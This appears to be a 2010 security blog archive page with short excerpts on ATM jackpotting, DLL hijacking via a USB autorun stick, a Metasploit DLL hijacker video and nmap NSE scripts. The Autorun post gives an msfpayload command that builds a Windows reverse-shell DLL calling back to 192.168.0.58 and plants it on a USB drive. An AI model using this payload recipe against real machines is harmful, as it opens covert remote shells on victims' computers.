This talk was presented at BlackHat 2010 by Barnaby Jack. It’s about hacking (aka – jackpotting) automated teller machines. Pretty interesting.
Archive for August, 2010
Autorun DLL Hijacker (USB stick)
Posted: 26th August 2010 by Matt in code, hacks, securityTags: 0day, autorun, dll, exploit, hack, hijacker, Hijacking, network security audit, USB, vulnerability
I decided that it might be useful to be able to utilize DLL hijacking with Autorun.. here’s the outcome. # msfpayload windows/shell/reverse_tcp LHOST=192.168.0.58 D > /media/KINGSTON/wab32res.dll Created by msfpayload (http://www.metasploit.com). Payload: windows/shell/reverse_tcp Length: 290 Options: LHOST=192.168.0.58
Video Demo of DLL Hijacking Attack.
Posted: 26th August 2010 by Matt in hacks, securityTags: 0day, address book, dll, exploit, hack, hijack, Microsoft, vulnerability, webdav_dll_hijacker
This is a quick video demonstrating the “webdav_dll_hijacker” Metasploit module. In this video, I target Windows Address Book (.vcf/wab32res.dll) (Best viewed in fullscreen mode in 480p or higher. Youtube absolutely killed the video quality. Thanks Youtube!) Just to make sure this is clear.. the window on the left side of the screen is my Linux [...]
Favorite nmap NSE scripts
Posted: 25th August 2010 by Matt in code, hacks, securityTags: Administrator, attack, brute force, dns-zone-transfer, dnszonetransfer, enum, Enumeration, hack, http-enum, MS08-067, nmap, nse, nsedoc, scripts, smb-brute, smb-check-vulns, smb-enum-users, snmp-netstat, snmp-processes, snmp-win32-services, snmp-win32-shares, snmp-win32-users, transfer, vulnerability
I cannot say enough good things about NSE (Nmap Scripting Engine). I’ve written a couple of posts about it and why I find it so useful, but in this post I’m going to cover some of my favorite scripts that come with the most recent Nmap release (5.35 DC1 (The DefCon release.. oooh. ). The [...]